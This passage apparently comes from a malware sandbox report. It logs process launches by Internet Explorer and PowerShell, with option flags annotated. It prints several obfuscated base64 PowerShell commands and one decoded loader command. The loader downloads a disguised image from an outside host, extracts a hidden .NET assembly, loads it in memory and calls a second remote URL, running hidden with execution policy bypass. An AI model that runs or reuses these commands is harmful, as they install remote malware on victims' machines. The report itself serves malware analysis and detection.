E€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD |
parent_process | iexplore.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD | ||||||
parent_process | iexplore.exe | martian_process | powershell -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/583/411/original/hta.jpg?1692658229';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.dmckh/BI/221.932.49.32//:ptth');$method.Invoke($null, $arguments)" |
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |